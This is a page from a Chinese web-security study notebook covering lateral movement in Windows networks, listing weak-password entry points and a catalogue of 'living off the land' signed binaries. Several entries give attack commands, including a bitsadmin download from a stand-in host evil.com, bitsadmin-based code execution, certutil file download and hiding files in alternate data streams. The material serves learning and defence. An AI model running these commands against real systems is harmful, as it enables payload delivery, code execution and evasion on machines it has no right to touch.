<!DOCTYPE html>
<html class="writer-html5" lang="en" data-content_root="../../">
<head>
  <meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />

  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>6.1.5. 横向移动 &mdash; Web安全学习笔记 1.0 documentation</title>
      <link rel="stylesheet" type="text/css" href="../../_static/pygments.css?v=fa44fd50" />
      <link rel="stylesheet" type="text/css" href="../../_static/css/theme.css?v=19f00094" />

  
  <!--[if lt IE 9]>
    <script src="../../_static/js/html5shiv.min.js"></script>
  <![endif]-->
  
        <script src="../../_static/documentation_options.js?v=f2a433a1"></script>
        <script src="../../_static/doctools.js?v=888ff710"></script>
        <script src="../../_static/sphinx_highlight.js?v=dc90522c"></script>
    <script src="../../_static/js/theme.js"></script>
    <link rel="index" title="Index" href="../../genindex.html" />
    <link rel="search" title="Search" href="../../search.html" />
    <link rel="next" title="6.1.6. MSPRC" href="msrpc.html" />
    <link rel="prev" title="6.1.4. 痕迹清理" href="trace.html" /> 
</head>

<body class="wy-body-for-nav"> 
  <div class="wy-grid-for-nav">
    <nav data-toggle="wy-nav-shift" class="wy-nav-side">
      <div class="wy-side-scroll">
        <div class="wy-side-nav-search" >

          
          
          <a href="../../index.html" class="icon icon-home">
            Web安全学习笔记
          </a>
              <div class="version">
                1.0
              </div>
<div role="search">
  <form id="rtd-search-form" class="wy-form" action="../../search.html" method="get">
    <input type="text" name="q" placeholder="Search docs" aria-label="Search docs" />
    <input type="hidden" name="check_keywords" value="yes" />
    <input type="hidden" name="area" value="default" />
  </form>
</div>
        </div><div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="Navigation menu">
              <p class="caption" role="heading"><span class="caption-text">内容索引:</span></p>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="../../basic/index.html">1. 序章</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../network/index.html">2. 计算机网络与协议</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../info/index.html">3. 信息收集</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../vuln/index.html">4. 常见漏洞攻防</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../language/index.html">5. 语言与框架</a></li>
<li class="toctree-l1 current"><a class="reference internal" href="../index.html">6. 内网渗透</a><ul class="current">
<li class="toctree-l2 current"><a class="reference internal" href="index.html">6.1. Windows内网渗透</a><ul class="current">
<li class="toctree-l3"><a class="reference internal" href="info.html">6.1.1. 信息收集</a></li>
<li class="toctree-l3"><a class="reference internal" href="persistence.html">6.1.2. 持久化</a></li>
<li class="toctree-l3"><a class="reference internal" href="privilege.html">6.1.3. 权限</a></li>
<li class="toctree-l3"><a class="reference internal" href="trace.html">6.1.4. 痕迹清理</a></li>
<li class="toctree-l3 current"><a class="current reference internal" href="#">6.1.5. 横向移动</a><ul>
<li class="toctree-l4"><a class="reference internal" href="#id2">6.1.5.1. 常见入口</a></li>
<li class="toctree-l4"><a class="reference internal" href="#lolbas">6.1.5.2. LOLBAS</a></li>
</ul>
</li>
<li class="toctree-l3"><a class="reference internal" href="msrpc.html">6.1.6. MSPRC</a></li>
<li class="toctree-l3"><a class="reference internal" href="domain/index.html">6.1.7. 域渗透</a></li>
</ul>
</li>
<li class="toctree-l2"><a class="reference internal" href="../linux/index.html">6.2. Linux内网渗透</a></li>
<li class="toctree-l2"><a class="reference internal" href="../trojan.html">6.3. 后门技术</a></li>
<li class="toctree-l2"><a class="reference internal" href="../misc.html">6.4. 综合技巧</a></li>
<li class="toctree-l2"><a class="reference internal" href="../ref.html">6.5. 参考链接</a></li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="../../cloud/index.html">7. 云安全</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../defense/index.html">8. 防御技术</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../auth/index.html">9. 认证机制</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../tools/index.html">10. 工具与资源</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../manual/index.html">11. 手册速查</a></li>
<li class="toctree-l1"><a class="reference internal" href="../../misc/index.html">12. 其他</a></li>
</ul>

        </div>
      </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"><nav class="wy-nav-top" aria-label="Mobile navigation menu" >
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="../../index.html">Web安全学习笔记</a>
      </nav>

      <div class="wy-nav-content">
        <div class="rst-content">
          <div role="navigation" aria-label="Page navigation">
  <ul class="wy-breadcrumbs">
      <li><a href="../../index.html" class="icon icon-home" aria-label="Home"></a></li>
          <li class="breadcrumb-item"><a href="../index.html"><span class="section-number">6. </span>内网渗透</a></li>
          <li class="breadcrumb-item"><a href="index.html"><span class="section-number">6.1. </span>Windows内网渗透</a></li>
      <li class="breadcrumb-item active"><span class="section-number">6.1.5. </span>横向移动</li>
      <li class="wy-breadcrumbs-aside">
            <a href="../../_sources/intranet/windows/lateral.rst.txt" rel="nofollow"> View page source</a>
      </li>
  </ul>
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
           <div itemprop="articleBody">
             
  <section id="id1">
<h1><span class="section-number">6.1.5. </span>横向移动<a class="headerlink" href="#id1" title="Link to this heading">¶</a></h1>
<section id="id2">
<h2><span class="section-number">6.1.5.1. </span>常见入口<a class="headerlink" href="#id2" title="Link to this heading">¶</a></h2>
<ul class="simple">
<li><p>SMB弱密码</p></li>
<li><p>SqlServer弱密码</p></li>
</ul>
</section>
<section id="lolbas">
<h2><span class="section-number">6.1.5.2. </span>LOLBAS<a class="headerlink" href="#lolbas" title="Link to this heading">¶</a></h2>
<section id="id3">
<h3><span class="section-number">6.1.5.2.1. </span>简介<a class="headerlink" href="#id3" title="Link to this heading">¶</a></h3>
<p>LOLBAS，全称Living Off The Land Binaries and Scripts (and also Libraries)，是一种白利用方式，是在2013年DerbyCon由Christopher Campbell和Matt Graeber发现，最终Philip Goh提出的概念。</p>
<p>这些程序一般有有Microsoft或第三方认证机构的签名，但是除了可以完成正常的功能，也能够被用于内网渗透中。这些程序可能会被用于：下载安全恶意程序、执行恶意代码、绕过UAC、绕过程序控制等。</p>
</section>
<section id="id4">
<h3><span class="section-number">6.1.5.2.2. </span>常见程序<a class="headerlink" href="#id4" title="Link to this heading">¶</a></h3>
<ul class="simple">
<li><dl class="simple">
<dt>appsyncvpublishing.exe</dt><dd><ul>
<li><p>执行powershell</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>bitsadmin.exe</dt><dd><ul>
<li><p>下载文件 <code class="docutils literal notranslate"><span class="pre">bitsadmin</span> <span class="pre">/transfer</span> <span class="pre">&lt;job_name&gt;</span> <span class="pre">/priority</span> <span class="pre">&lt;priority&gt;</span> <span class="pre">&lt;remote_path&gt;</span> <span class="pre">&lt;local_path&gt;</span></code></p></li>
<li><p>下载文件 <code class="docutils literal notranslate"><span class="pre">bitsadmin</span> <span class="pre">/create</span> <span class="pre">1</span> <span class="pre">bitsadmin</span> <span class="pre">/addfile</span> <span class="pre">1</span> <span class="pre">https://evil.com/autoruns.exe</span> <span class="pre">c:\data\playfolder\autoruns.exe</span> <span class="pre">bitsadmin</span> <span class="pre">/RESUME</span> <span class="pre">1</span> <span class="pre">bitsadmin</span> <span class="pre">/complete</span> <span class="pre">1</span></code></p></li>
<li><p>复制文件 <code class="docutils literal notranslate"><span class="pre">bitsadmin</span> <span class="pre">/create</span> <span class="pre">1</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/addfile</span> <span class="pre">1</span> <span class="pre">c:\windows\system32\cmd.exe</span> <span class="pre">c:\data\playfolder\cmd.exe</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/RESUME</span> <span class="pre">1</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/Complete</span> <span class="pre">1</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/reset</span></code></p></li>
<li><p>代码执行 <code class="docutils literal notranslate"><span class="pre">bitsadmin</span> <span class="pre">/create</span> <span class="pre">1</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/addfile</span> <span class="pre">1</span> <span class="pre">c:\windows\system32\cmd.exe</span> <span class="pre">c:\data\playfolder\cmd.exe</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/SetNotifyCmdLine</span> <span class="pre">1</span> <span class="pre">c:\data\playfolder\cmd.exe</span> <span class="pre">NULL</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/RESUME</span> <span class="pre">1</span> <span class="pre">&amp;</span> <span class="pre">bitsadmin</span> <span class="pre">/Reset</span></code></p></li>
</ul>
</dd>
</dl>
</li>
<li><p>cdb.exe</p></li>
<li><dl class="simple">
<dt>certutil.exe</dt><dd><ul>
<li><p>可安装、备份、删除、管理和执行证书</p></li>
<li><p>证书存储相关功能</p></li>
<li><p>下载文件 <code class="docutils literal notranslate"><span class="pre">certutil</span> <span class="pre">-urlcache</span> <span class="pre">-split</span> <span class="pre">-f</span> <span class="pre">https://addr/example.exe</span></code></p></li>
<li><p>注意 certutil 是有cache的，需要显式删除</p></li>
<li><p>base64 编解码 <code class="docutils literal notranslate"><span class="pre">certutil</span> <span class="pre">-encode</span></code> /  <code class="docutils literal notranslate"><span class="pre">certutil</span> <span class="pre">-decode</span></code></p></li>
</ul>
</dd>
</dl>
</li>
<li><p>cmd.exe</p></li>
<li><p>cmstp.exe</p></li>
<li><dl class="simple">
<dt>control.exe</dt><dd><ul>
<li><p><a class="reference external" href="https://www.dearbytes.com/blog/playing-around-with-nsa-hacking-tools/">加载dll</a></p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>csc.exe</dt><dd><ul>
<li><p>编译 C# 载荷</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>cscript.exe</dt><dd><ul>
<li><p>执行脚本</p></li>
</ul>
</dd>
</dl>
</li>
<li><p>extexport.exe</p></li>
<li><dl class="simple">
<dt>expand.exe</dt><dd><ul>
<li><p>展开一个或多个压缩文件</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>forfiles.exe</dt><dd><ul>
<li><p><code class="docutils literal notranslate"><span class="pre">forfiles</span> <span class="pre">/p</span> <span class="pre">c:\windows\system32</span> <span class="pre">/m</span> <span class="pre">notepad.exe</span> <span class="pre">/c</span> <span class="pre">calc.exe</span></code></p></li>
</ul>
</dd>
</dl>
</li>
<li><p>mofcomp.exe</p></li>
<li><p>makecab.exe</p></li>
<li><dl class="simple">
<dt>msbuild.exe</dt><dd><ul>
<li><p>构建应用程序</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>mshta.exe</dt><dd><ul>
<li><p>HTML应用</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>msiexec.exe</dt><dd><ul>
<li><p>安装msi</p></li>
<li><p>加载dll</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>msxsl.exe</dt><dd><ul>
<li><p>处理XSL程序</p></li>
</ul>
</dd>
</dl>
</li>
<li><p>netsh.exe</p></li>
<li><dl class="simple">
<dt>installutil.exe</dt><dd><ul>
<li><p>安装/卸载程序组件</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>IEExec.exe</dt><dd><ul>
<li><p>.NET Framework附带程序</p></li>
</ul>
</dd>
</dl>
</li>
<li><p>powershell.exe</p></li>
<li><dl class="simple">
<dt>psexec.exe</dt><dd><ul>
<li><p><a class="reference external" href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec">https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec</a></p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>reg.exe</dt><dd><ul>
<li><p>注册表控制台</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>regedit.exe</dt><dd><ul>
<li><p>注册表修改</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>regsvr32.exe</dt><dd><ul>
<li><p>注册动态链接库/ActiveX控件</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>rundll32.exe</dt><dd><ul>
<li><p>执行DLL文件中的内部函数</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>sc.exe</dt><dd><ul>
<li><p>查看服务状态管理</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>schtasks.exe</dt><dd><ul>
<li><p>定时计划任务</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>shred</dt><dd><ul>
<li><p>重复写入文件，防止文件恢复</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>type.exe</dt><dd><ul>
<li><p>利用ads隐藏文件 <code class="docutils literal notranslate"><span class="pre">type</span> <span class="pre">&lt;filepath&gt;</span> <span class="pre">&lt;target_file:ads&gt;</span></code></p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>wmic.exe</dt><dd><ul>
<li><p>Windows管理工具</p></li>
</ul>
</dd>
</dl>
</li>
<li><p>windbg.exe</p></li>
<li><p>winrm.exe</p></li>
<li><dl class="simple">
<dt>wscript.exe</dt><dd><ul>
<li><p>脚本引擎</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>waitfor.exe</dt><dd><ul>
<li><p>用于同步网络中计算机，可以发送或等待系统上的信号。</p></li>
</ul>
</dd>
</dl>
</li>
</ul>
</section>
</section>
</section>


           </div>
          </div>
          <footer><div class="rst-footer-buttons" role="navigation" aria-label="Footer">
        <a href="trace.html" class="btn btn-neutral float-left" title="6.1.4. 痕迹清理" accesskey="p" rel="prev"><span class="fa fa-arrow-circle-left" aria-hidden="true"></span> Previous</a>
        <a href="msrpc.html" class="btn btn-neutral float-right" title="6.1.6. MSPRC" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right" aria-hidden="true"></span></a>
    </div>

  <hr/>

  <div role="contentinfo">
    <p>&#169; Copyright 2019-2023, Lyle.</p>
  </div>

  Built with <a href="https://www.sphinx-doc.org/">Sphinx</a> using a
    <a href="https://github.com/readthedocs/sphinx_rtd_theme">theme</a>
    provided by <a href="https://readthedocs.org">Read the Docs</a>.
   

</footer>
        </div>
      </div>
    </section>
  </div>
  <script>
      jQuery(function () {
          SphinxRtdTheme.Navigation.enable(true);
      });
  </script> 

</body>
</html>